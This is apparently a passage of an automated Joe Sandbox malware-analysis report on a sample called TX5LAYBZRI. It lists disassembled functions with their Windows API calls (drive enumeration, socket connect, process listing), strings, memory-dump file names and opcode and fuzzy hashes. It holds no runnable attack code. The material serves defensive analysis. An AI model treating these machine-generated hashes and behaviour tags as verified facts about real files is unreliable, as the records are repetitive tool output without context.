                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\$A:\
                                            • API String ID: 999431828-1047444362
                                            • Opcode ID: c32ec0aeda906bb3c8fc35793bdc67ef52749d9c772ae069933314a486eaa4c2
                                            • Instruction ID: 32526ce90787bbbca9a4d2c0c4dbdf8893ec7c41b2ea6aa13a87c5bc3532d4a7
                                            • Opcode Fuzzy Hash: c32ec0aeda906bb3c8fc35793bdc67ef52749d9c772ae069933314a486eaa4c2
                                            • Instruction Fuzzy Hash: ED41C3FB26C121FE6241808E2B14EF66A6DE4C7378B308DE6F607D6502E2D84B496171
                                            Function 00BCA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                            Download Yara Rule
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 00BCA1C7
                                            Strings
                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00BCA23B
                                            • getsockname() failed with errno %d: %s, xrefs: 00BCA1F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                            • API String ID: 3358416759-2605427207
                                            • Opcode ID: 3f6aa5fba7092b04c1d0f02b0e0069e415182010ce9e67b0db452ef99f2b0fd5
                                            • Instruction ID: 252cf3d4a092c42a6f1d923e0775f4526c0df5b702f7fcf5976ef51af84abccb
                                            • Opcode Fuzzy Hash: 3f6aa5fba7092b04c1d0f02b0e0069e415182010ce9e67b0db452ef99f2b0fd5
                                            • Instruction Fuzzy Hash: 85210A31808284ABF7259B58DC42FE7B3FCEF91328F040658F99853151FB32698587E2
                                            Function 00BAD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WSAStartup.WS2_32(00000202), ref: 00BAD65B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: if_nametoindex$iphlpapi.dll
                                            • API String ID: 724789610-3097795196
                                            • Opcode ID: d0016c44f33b7782741b37e4bb6865176fe8f4060a063f701ee6b4b85cb23b7e
                                            • Instruction ID: f12fd47a2f894d0df16aca744d9b3d0de6eaab1218f07354a0cabd892f6db782
                                            • Opcode Fuzzy Hash: d0016c44f33b7782741b37e4bb6865176fe8f4060a063f701ee6b4b85cb23b7e
                                            • Instruction Fuzzy Hash: 71012BD0D4538187F7217B3CE91B76636D0AB62305F4918A8E85982187F669C448C293
                                            Function 079402DE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 78149936d40dcb86bd4c52456da5a134f8ce8437661d5b656338c700b623e92a
                                            • Instruction ID: e803a16c159557e6e886585f0d921b2fc1bdf7bd07c1b36939bc91e278361f12
                                            • Opcode Fuzzy Hash: 78149936d40dcb86bd4c52456da5a134f8ce8437661d5b656338c700b623e92a
                                            • Instruction Fuzzy Hash: 4841F4F726D121FE6242809E1B54EF66A6EE4C7378B308DE6F607C6502E2C84B495171
                                            Function 07940308 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 84ba11db766b3f48d08cfc804bcdf7ef95ddcbc49acfc0e8c7206204b779428d
                                            • Instruction ID: 18068c7f44303abaf91cceaba93f7fac816124c2733b38ec19d68fb0294c51cc
                                            • Opcode Fuzzy Hash: 84ba11db766b3f48d08cfc804bcdf7ef95ddcbc49acfc0e8c7206204b779428d
                                            • Instruction Fuzzy Hash: DA41E6FB26D121FE6241909E1B55EF66A6EE4C3378B308DF6F607C6602E2D84A496131
                                            Function 079402F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 4b3cad09c24fa6dac4161fecf55d39e14ac30f13d90f061107bbbe9a556e8048
                                            • Instruction ID: e66b79472aec673dc157599c26719b5b0c4599348b68b19428633844ec19cf2b
                                            • Opcode Fuzzy Hash: 4b3cad09c24fa6dac4161fecf55d39e14ac30f13d90f061107bbbe9a556e8048
                                            • Instruction Fuzzy Hash: 9B41E4FB26D121FE6242808E1B14EF66A6DE4C7338B308DE6F657C6602F2D84A496131
                                            Function 079403D5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 5a887816d64becbf347fa5d347d615333184fa4df8ba1c8540cf52fcec04945b
                                            • Instruction ID: a3bf75dbccf0388d65d96d2d753b29aac0a1a2f85f85d2593189e15b8c23f7dd
                                            • Opcode Fuzzy Hash: 5a887816d64becbf347fa5d347d615333184fa4df8ba1c8540cf52fcec04945b
                                            • Instruction Fuzzy Hash: 094116FB26D121FE6242809E1B14EF66A6DE4C3338B308DB6F617C6642F2D80A496171
                                            Function 0794032B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: f5ab60f9f44efafded22b8b45338bbc653c8ccd3260466be73bebf59e52c0214
                                            • Instruction ID: 28fdc9f733348528d5b8193af4dc876cdd212d7268f6e76fe92356f07efdf4f0
                                            • Opcode Fuzzy Hash: f5ab60f9f44efafded22b8b45338bbc653c8ccd3260466be73bebf59e52c0214
                                            • Instruction Fuzzy Hash: 7741E3FB26D121FE6242909E1B14EF66A6DE4C7338F308DE6F617C6602F2D84A495131
                                            Function 07940341 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 802f0a41f9ad97d156944aa22b5017e1b74261296f91571897834e21915d17bc
                                            • Instruction ID: cdbb684fd3fda700e7fdc138ae03d23f5ea89e4c175df20142e90c60f99dd03c
                                            • Opcode Fuzzy Hash: 802f0a41f9ad97d156944aa22b5017e1b74261296f91571897834e21915d17bc
                                            • Instruction Fuzzy Hash: 8531F5FB26D121FE6242808E1B14EF66A6DE4C7338F308DE6F617C6602F2D84A495171
                                            Function 0794034E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 0a18261d402e967b6adfd459f5be227dcecb0d74e97e098dca311e0d5cb40531
                                            • Instruction ID: 9e62d9e2f9eb2216d5d293fc4b7d456114b8b67b71ad45f10c3f734cdfc2a8a5
                                            • Opcode Fuzzy Hash: 0a18261d402e967b6adfd459f5be227dcecb0d74e97e098dca311e0d5cb40531
                                            • Instruction Fuzzy Hash: C231F5FB23D121FE6242819E1B54EF66A6DE4C3338B308DE6F657C6642E2D80E496171
                                            Function 07940361 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: d6cdbd4c9df72249299018b43be74155818cb9e527f7086aea94c92e5eda25ed
                                            • Instruction ID: 15e7565fa42058ba5ad7bc507934361466b679f411b8232c7d0481c45157fb41
                                            • Opcode Fuzzy Hash: d6cdbd4c9df72249299018b43be74155818cb9e527f7086aea94c92e5eda25ed
                                            • Instruction Fuzzy Hash: EA31E4FB26D121FE7242809E1B14EF66A6DE4C3378B308DF6F657C6642E2D80E496171
                                            Function 0794036F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: a3f4bb15531c5ce8945c983031ecaf215f58105e2d3eff5d385b04e946189d52
                                            • Instruction ID: b408c07fbb944ef3c2f7a34085a2b234f1a9193ffbfc0ac7b23e5c548576d5fc
                                            • Opcode Fuzzy Hash: a3f4bb15531c5ce8945c983031ecaf215f58105e2d3eff5d385b04e946189d52
                                            • Instruction Fuzzy Hash: EB31D5FB26D121FE7242809E1B14EF66A6DE4C3338B308DB6F657C6642F2D80A496171
                                            Function 07940386 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: c70c213d5149484a7581a93356a38ab8ec48528a621cb9bd47a2673a648e840f
                                            • Instruction ID: 4405a37de6fc8b89a186dc5b3864cb77131d7d7124f7966743a4a7257b4c83dd
                                            • Opcode Fuzzy Hash: c70c213d5149484a7581a93356a38ab8ec48528a621cb9bd47a2673a648e840f
                                            • Instruction Fuzzy Hash: 533105FB22C121FE6242809E1B54EF66A6DE8C3378B308DF6F617C6542F2D84E496171
                                            Function 079403AB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLogicalDrives.KERNELBASE(?,?,000000ED), ref: 079403B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140470501.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7940000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: DrivesLogical
                                            • String ID: A:\
                                            • API String ID: 999431828-3379428675
                                            • Opcode ID: 571d8602e5871435b40650706e755122b116e2286330c57209f943892a0e6f76
                                            • Instruction ID: 4483fc77d1e4b759813117585da6c2f90bfec41fefa647186d5dee46110577f2
                                            • Opcode Fuzzy Hash: 571d8602e5871435b40650706e755122b116e2286330c57209f943892a0e6f76
                                            • Instruction Fuzzy Hash: A831C3FB22D121FD3142809E1B54EF66A6DE4C3338B308DA6F657C6642F2C80A496171
                                            Function 00B978B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: FD %s:%d sclose(%d)
                                            • API String ID: 2781271927-3116021458
                                            • Opcode ID: 730343755032ceeda807b8d4bf26dffd9602f8316596e76e042de79b8d76e862
                                            • Instruction ID: 740c8b621faa84a04e1d92f93b239662ace67a2a4c717d913c3f83185485712f
                                            • Opcode Fuzzy Hash: 730343755032ceeda807b8d4bf26dffd9602f8316596e76e042de79b8d76e862
                                            • Instruction Fuzzy Hash: 12D05B3255512167852155596D49C4B77E4DDC7F60F060CA8F94467304D5209C0183F1
                                            Function 00C5B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00C5B29E,?,00000000,?,?), ref: 00C5B0B9
                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00C43C41,00000000), ref: 00C5B0C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: ErrorLastconnect
                                            • String ID:
                                            • API String ID: 374722065-0
                                            • Opcode ID: 66d740e2293936849c6283e970c4fee861abec4a52afb4394cc1e4045161a723
                                            • Instruction ID: 2c2257e850a1cedc67c8dbb00c3731cedb90186155ea48ac1f046071c101136a
                                            • Opcode Fuzzy Hash: 66d740e2293936849c6283e970c4fee861abec4a52afb4394cc1e4045161a723
                                            • Instruction Fuzzy Hash: C40128362042005BCB205A29D844F6BBB99FFC8374F140714FD78931D1D726EE848755
                                            Function 0792059A Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: za(
                                            • API String ID: 0-2615755189
                                            • Opcode ID: 45260ff9a9902cfa69b3f6dae7886992b75ddb14632dd896fdbb986a2e450a82
                                            • Instruction ID: 421e9478971ed5af72cd230d32d7ae65ecfae5ec22882d28212b69a91a15950b
                                            • Opcode Fuzzy Hash: 45260ff9a9902cfa69b3f6dae7886992b75ddb14632dd896fdbb986a2e450a82
                                            • Instruction Fuzzy Hash: A8C129EB529125BDB651E18A6F14BFBA76DE2C7738F308827F803D150AD2D80A4F6131
                                            Function 079205AA Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: za(
                                            • API String ID: 0-2615755189
                                            • Opcode ID: a7da0746efc71ad403746902665f35a2680d2c2f365876b1d57f9a32fe9acb37
                                            • Instruction ID: aa6a0796e75893405406e38b03af5be30ae2e29b09d7453a16937c125748ae56
                                            • Opcode Fuzzy Hash: a7da0746efc71ad403746902665f35a2680d2c2f365876b1d57f9a32fe9acb37
                                            • Instruction Fuzzy Hash: C7C129EB529125BDB651E58A6F14BFB676DE2C7738F308827F803D150AD2D80A4F6131
                                            Function 079205BE Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: za(
                                            • API String ID: 0-2615755189
                                            • Opcode ID: 1a5457001c5074c1cf8c63bf79a4a6fcfb5816fd11e701c80b6ef0815fa05d67
                                            • Instruction ID: 5a8d9d49d80f3be87a7eccae7b11e3343018985cb8be4d270cfc55527a4fb31a
                                            • Opcode Fuzzy Hash: 1a5457001c5074c1cf8c63bf79a4a6fcfb5816fd11e701c80b6ef0815fa05d67
                                            • Instruction Fuzzy Hash: 78C139EB52D125BDB651E18A6B14BFBA76DE2C7738F308827F807D150AD2D80A4F6131
                                            Function 079801CC Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2dfeb49551dccfe8aeb861913ae8003cf2608ee3e868351c16b4eafa6e11d49f
                                            • Instruction ID: 8a0f71bead312a407a9a1fdfa62b3c5a5ac5c12144665dd4801f25eb62ec5a05
                                            • Opcode Fuzzy Hash: 2dfeb49551dccfe8aeb861913ae8003cf2608ee3e868351c16b4eafa6e11d49f
                                            • Instruction Fuzzy Hash: 334146E72AD121BEB2C2A4695F549FA2B6EE9D3738B348827F407C6543F3C44A4E5071
                                            Function 079801E1 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 800d760eb1abeab4cbcc42213d3337076b8b2b005cf766dc8c5ccf06fb57e3bd
                                            • Instruction ID: 7ef0e2a336b5830b298437f8da3d5bc6767f0585eceb61428512c63520474f78
                                            • Opcode Fuzzy Hash: 800d760eb1abeab4cbcc42213d3337076b8b2b005cf766dc8c5ccf06fb57e3bd
                                            • Instruction Fuzzy Hash: 604168EB16D111BEB282A5695F549FB2B6EE9D3338B34882BF407C7543F2C44A4E5031
                                            Function 07980262 Relevance: 1.7, APIs: 1, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FirstProcess32
                                            • String ID:
                                            • API String ID: 2623510744-0
                                            • Opcode ID: c170ae1038bf710e6b35571bb67f586c59548f81428689efc3c796d2909a058c
                                            • Instruction ID: b554153dc617dfa23cc31912ad8ca34c3dbd28b69a769b77acf6e798155aae99
                                            • Opcode Fuzzy Hash: c170ae1038bf710e6b35571bb67f586c59548f81428689efc3c796d2909a058c
                                            • Instruction Fuzzy Hash: 704149E715D120BEA282A56D5B549FA6B5DE9D3338B34882BF407CB543F2C44A4E8131
                                            Function 07980207 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140533757.0000000007980000.00000040.00001000.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7980000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
